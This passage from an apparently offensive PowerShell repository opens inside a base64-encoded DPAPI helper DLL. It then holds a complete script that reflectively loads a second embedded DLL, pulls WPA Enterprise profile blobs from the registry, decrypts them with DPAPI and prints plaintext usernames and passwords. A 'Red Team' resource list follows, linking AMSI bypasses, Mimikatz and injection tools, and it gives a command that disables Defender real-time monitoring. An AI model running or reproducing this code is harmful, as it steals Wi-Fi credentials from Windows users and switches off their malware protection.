AJYAAgGFACMAPCMAAAAAlgACAY0AJgDDJAAAAACGGAoBmAApALAkAAAAAJEY+wMnASkAzCQAAAAAkQBfAaQAKQBQJQAAAACGGAoBmAAqAAAAAQBkAQAAAgBvAQAAAwB9AQAABACGAQAABQCQAQAABgCYAQAABwCgAQAAAQCgAQAAAgCsAQAAAwB9AQAABACGAQAABQCQAQAABgCYAQAABwBkAQAAAQC7AQAAAQC+AQAAAgDDAQAAAQDIAQAAAQDSAQAAAgDIAQAAAQDSAQAAAgDIAQAAAwDaAQAAAQDSAQAAAgDIAQAAAwDaAQAABADiAQAAAQDSAQAAAgDuAQAAAwD9AQAABADiAQAAAQAKAgAAAQAKAgIAAgDiAQAAAQAKAgAAAgDaAQIAAwDiAQAAAQBBAgAAAgD9AQIAAwDiAQAAAQBRAiEACgGYACkACgGqADEACgGYADkACgGvAEEA6gK0AFEABAO7AFEAEAPBAGEAJAM+AGEAKQPGAGkACgGvAFEAPwPMAHEASwOcAHkAZgPVAHkAbwPaAIEAgAPgAGkACgHmAFEAjwPtAIkACgGqAFEAPwPxAGEAxgPGAFEA1AP6AIEA4AMbAXkA8QMhAWEAAgTBAAkACgGYAJEACgErAaEACgGYAKkASgQxAakASgQ3AWkAVAQ+AakASgRCAWkAYARHAQgABAANAAgACAASAAgAMAANAAgANACfAC4AEwBWAS4AGwBfAQAC2wANAP8AFwFMAccCRgEDAKsAAQBGAQUAvAABAASAAAAAAAAAAAAAAAAAAAAAABQAAAAEAAAAAAAAAAAAAAABAFAAAAAAAAQAAAAAAAAAAAAAAAEAWQAAAAAAAwACAAQAAgAFAAIAAAAAPE1vZHVsZT4ARFBBUEkuZGxsAERQQVBJAERBVEFfQkxPQgBDUllQVFBST1RFQ1RfUFJPTVBUU1RSVUNUAEtleVR5cGUARFBBUElUZXN0AG1zY29ybGliAFN5c3RlbQBPYmplY3QAVmFsdWVUeXBlAEVudW0AQ1JZUFRQUk9URUNUX1VJX0ZPUkJJRERFTgBDUllQVFBST1RFQ1RfTE9DQUxfTUFDSElORQBDcnlwdFByb3RlY3REYXRhAENyeXB0VW5wcm90ZWN0RGF0YQBOdWxsUHRyAEluaXRQcm9tcHQASW5pdEJMT0IAZGVmYXVsdEtleVR5cGUARW5jcnlwdABEZWNyeXB0AC5jdG9yAGNiRGF0YQBwYkRhdGEAY2JTaXplAGR3UHJvbXB0RmxhZ3MAaHduZEFwcABzelByb21wdAB2YWx1ZV9fAFVzZXJLZXkATWFjaGluZUtleQBNYWluAHBQbGFpblRleHQAc3pEZXNjcmlwdGlvbgBwRW50cm9weQBwUmVzZXJ2ZWQAcFByb21wdABkd0ZsYWdzAHBDaXBoZXJUZXh0AHBzekRlc2NyaXB0aW9uAHBzAGRhdGEAYmxvYgBwbGFpblRleHQAa2V5VHlwZQBlbnRyb3B5AGRlc2NyaXB0aW9uAHBsYWluVGV4dEJ5dGVzAGVudHJvcHlCeXRlcwBjaXBoZXJUZXh0AFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUAY2lwaGVyVGV4dEJ5dGVzAGFyZ3MAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAERsbEltcG9ydEF0dHJpYnV0ZQBjcnlwdDMyLmRsbABUeXBlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAE1hcnNoYWwAU2l6ZU9mAEJ5dGUAQWxsb2NIR2xvYmFsAEludFB0cgBaZXJvAG9wX0VxdWFsaXR5AEV4Y2VwdGlvbgBDb3B5AFN0cmluZwBFbXB0eQBTeXN0ZW0uVGV4dABFbmNvZGluZwBnZXRfVVRGOABHZXRCeXRlcwBDb252ZXJ0AFRvQmFzZTY0U3RyaW5nAEdldExhc3RXaW4zMkVycm9yAFN5c3RlbS5Db21wb25lbnRNb2RlbABXaW4zMkV4Y2VwdGlvbgBvcF9JbmVxdWFsaXR5AEZyZWVIR2xvYmFsAEZyb21CYXNlNjRTdHJpbmcAR2V0U3RyaW5nAC5jY3RvcgBvcF9FeHBsaWNpdABTdHJ1Y3RMYXlvdXRBdHRyaWJ1dGUATGF5b3V0S2luZABTVEFUaHJlYWRBdHRyaWJ1dGUAQ29uc29sZQBXcml0ZUxpbmUAZ2V0X01lc3NhZ2UAZ2V0X0lubmVyRXhjZXB0aW9uAAAA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AE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABEAFAAQQBQAEkALgBkAGwAbAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAADAAAAJAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==")) | Out-Null 76 | } 77 | 78 | # This DLL is code that I have found available in StackOverflow to find locate offsets for specific byte array patterns. 79 | if(-not ([System.Management.Automation.PSTypeName]'Pattern.Search').Type) 80 | { 81 | # PatternSearch.dll 82 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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YgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")) | Out-Null 83 | Write-Verbose "Pattern.Search.dll has been reflected." 84 | } 85 | 86 | $NullReferenceString = "" 87 | $ProtectedFiles = @() 88 | $ProtectedFiles += Get-ProtectedData 89 | if($ProtectedFiles.Length -eq 0) 90 | { 91 | Write-Output "Error: No DPAPI binary data was retrieved." 92 | return 93 | } 94 | Write-Verbose "Harvested $($ProtectedFiles.Length) files." 95 | 96 | # https://github.com/ash47/EnterpriseWifiPasswordRecover 97 | [byte[]]$PasswordPattern = @(0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01) 98 | [byte[]]$UsernamePattern = @(0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00) 99 | 100 | $ProtectedFiles | ForEach-Object { 101 | # calls DPAPI UnprotectData(byte[] encrypted, byte[] entropy, out string Description) 102 | 103 | $DecryptedData = [DPAPI]::Decrypt([IO.File]::ReadAllBytes("C:\windows\temp\$_"), [Text.Encoding]::UTF8.GetBytes([String]::Empty), [ref] $NullReferenceString) 104 | 105 | $UsernameOffset = [Pattern.Search]::Locate($DecryptedData, $UsernamePattern)[0] 106 | $PasswordOffset = [Pattern.Search]::Locate($DecryptedData, $PasswordPattern)[0] 107 | 108 | # Here we will have Username and Domain 109 | $DomainAndUsername = [Text.Encoding]::UTF8.GetString((Get-String -InputStream ($DecryptedData[($UsernameOffset+8)..$PasswordOffset]))) | Out-String 110 | $EncryptedPassword = $DecryptedData[$PasswordOffset..$DecryptedData.Length] 111 | 112 | # Removes last null bytes. (No Padding will be superior to 16 bytes) 113 | foreach($i in 0..16) 114 | { 115 | $EncryptedPassword = Remove-LastNullByte -Array $EncryptedPassword 116 | } 117 | 118 | $DumpFile = "C:\windows\temp\password.bin" 119 | [IO.File]::WriteAllBytes($DumpFile, $EncryptedPassword) 120 | 121 | # SYSTEM can't decrypt password files on it's own. Now we RevertToSelf() so we are able to decrypt it. 122 | $ReversionStatus = [Revert]::RevertBack(); 123 | if($ReversionStatus -eq $false) 124 | { 125 | Write-Output "Could not revert back to user." 126 | return 127 | } 128 | 129 | # Last stage, if the line below succeeds, we have a plaintext password. 130 | $DecryptedPassword = [Text.Encoding]::UTF8.GetString((Get-String -InputStream ([DPAPI]::Decrypt([IO.File]::ReadAllBytes($DumpFile), [Text.Encoding]::UTF8.GetBytes([String]::Empty), [ref] $NullReferenceString)))) 131 | Write-Output "Username: $DomainAndUsername" 132 | Write-Output "Password: $DecryptedPassword" 133 | } 134 | } 135 | 136 | 137 | function Remove-LastNullByte 138 | { 139 | Param( 140 | [Parameter(Mandatory = $true, Position = 0)] 141 | [byte[]]$Array, 142 | 143 | [Parameter(Mandatory = $false, Position = 1)] 144 | [byte]$Banned 145 | ) 146 | 147 | $ArrayLength = $Array.Length - 1 148 | if($Array[$ArrayLength] -eq $Banned) 149 | { 150 | return $Array[0..($ArrayLength-1)] 151 | } 152 | return $Array 153 | } 154 | 155 | <# 156 | .SYNOPSIS 157 | This file uses the registry hive HKCU to retrieve binary data 158 | that is protected by DPAPI functions to hide WPA Enterprise 159 | passwords. 160 | 161 | #> 162 | function Get-ProtectedData 163 | { 164 | [CmdletBinding()] 165 | # File Array 166 | $Files = @(); 167 | 168 | # Retrieves data to be used by DPAPI decrypt function 169 | Get-ChildItem HKCU:\Software\Microsoft\Wlansvc\UserData\Profiles\ | ForEach-Object { 170 | $currentFile = Get-TemporaryFileName 171 | $Files += $currentFile 172 | Write-Verbose "Created file $currentFile" 173 | [IO.File]::WriteAllBytes("C:\windows\temp\$currentFile", (Get-ItemProperty $_.PSPath -Name MSMUserData | Select-Object MSMUserData).MSMUserData) 174 | } 175 | 176 | return $Files 177 | } 178 | 179 | function Get-TemporaryFileName 180 | { 181 | return ([IO.Path]::GetRandomFileName()).Split(".")[0] + ".tmp" 182 | } 183 | -------------------------------------------------------------------------------- /Red Team/README.md: -------------------------------------------------------------------------------- 1 | ## Resources 2 | 3 | - [Adversary Tactics: PowerShell](https://github.com/specterops/at-ps) - Adversary Tactics - PowerShell Training 4 | - [AtomicTestHarnesses](https://github.com/redcanaryco/AtomicTestHarnesses) - Public Repo for Atomic Test Harness. 5 | - [Collection of tools to exploit Windows](https://github.com/Hack-with-Github/Windows) 6 | - [Get-System-Techniques](https://github.com/S3cur3Th1sSh1t/Get-System-Techniques) 7 | - [Handy powershell scripts - puckiestyle](https://github.com/puckiestyle/powershell) - Handy powershell scripts - puckiestyle 8 | - [lab-hijack](https://github.com/poptar7/lab-hijack) 9 | - [Kautilya](https://github.com/samratashok/Kautilya) - Tool for easy use of Human Interface Devices for offensive security and penetration testing. 10 | - [powerglot](https://github.com/mindcrypt/powerglot) - Powerglot encodes offensive powershell scripts using polyglots . Offensive security tool useful for stego-malware, privilege escalation, lateral movement, reverse shell, etc. 11 | - [PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell) - Run PowerShell command without invoking powershell.exe 12 | - [PowerSharpPack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack) - Many usefull offensive CSharp Projects wraped into Powershell for easy usage. 13 | - [PowerShell-for-Hackers](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) - This repository is a collection of powershell functions every hacker should know 14 | - [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) - Abusing Impersonation Privileges on Windows 10 and Server 2019. 15 | - [Red Baron (archived)](https://github.com/byt3bl33d3r/Red-Baron) - Automate creating resilient, disposable, secure and agile infrastructure for Red Teams. 16 | - [RestrictedAdmin](https://github.com/GhostPack/RestrictedAdmin) - Remotely enables Restricted Admin Mode 17 | - [Threat Hunting with PowerShell](https://github.com/tomwechsler/Threat_Hunting_with_PowerShell/tree/main) - Security even with a small budget - there is no excuse! 18 | 19 | ## Active Directory 20 | - [AD_Enumeration_Hunt](https://github.com/alperenugurlu/AD_Enumeration_Hunt) - Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. 21 | 22 | ## Bypassing 23 | - [Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) 24 | - [Invisi-Shell](https://github.com/OmerYa/Invisi-Shell) - Hide your Powershell script in plain sight. Bypass all Powershell security features 25 | - [PowerShdll](https://github.com/p3nt4/PowerShdll) - Run PowerShell with rundll32. Bypass software restrictions. 26 | 27 | ## Collections 28 | - [3gstudent's Homework-of-Powershell](https://github.com/3gstudent/Homework-of-Powershell) - Collection. 29 | - [PowerShell-Suite](https://github.com/FuzzySecurity/PowerShell-Suite) - My musings with PowerShell 30 | - [Red_Team](https://github.com/BankSecurity/Red_Team) - Some scripts useful for red team activities 31 | - [Red Team Powershell Scripts](https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts) - Various PowerShell scripts that may be useful during red team exercise 32 | - [RedRabbit](https://github.com/securethelogs/RedRabbit) - Red Team PowerShell Script 33 | 34 | ## Credential 35 | - [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) - PowerShell Pass The Hash Utils. 36 | - [Mimikatz](https://github.com/gentilkiwi/mimikatz) - A little tool to play with Windows security 37 | 38 | ## Defender 39 | - [disable-defender.ps1](https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1) 40 | - Disable real-time monitoring by Defender. This stops it from scanning and detecting malicious software in **realtime**. It will still scan in **specified intervals** or manually 41 | ````powershell 42 | Set-MpPreference -DisableRealtimeMonitoring $true 43 | ```` 44 | 45 | ## DLL and Injection 46 | - [sRDI - Shellcode Reflective DLL Injection](https://github.com/monoxgas/sRDI) - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode. 47 | - [Syringe](https://github.com/rsmusllp/syringe) - A General Purpose DLL & Code Injection Utility 48 | - [Reflective DLL Injection](https://github.com/rsmusllp/ReflectiveDLLInjection) - Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. 49 | - [Unicorn](https://github.com/trustedsec/unicorn) - Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. 50 | 51 | ## DNS 52 | - [DNSDumpsterPS](https://github.com/cottinghamd/DNSDumpsterPS/blob/master/dnsdumpster.ps1) - DNS Dumpster Query in PowerShell. 53 | - [Powermad](https://github.com/Kevin-Robertson/Powermad) - PowerShell MachineAccountQuota and DNS exploit tools. 54 | 55 | ## Encryption and Obfuscation 56 | - [Encrypt-String (in progress)](https://github.com/Am0rphous/PowerShell-Collection/blob/master/Security/Encrypt-String.ps1) 57 | - 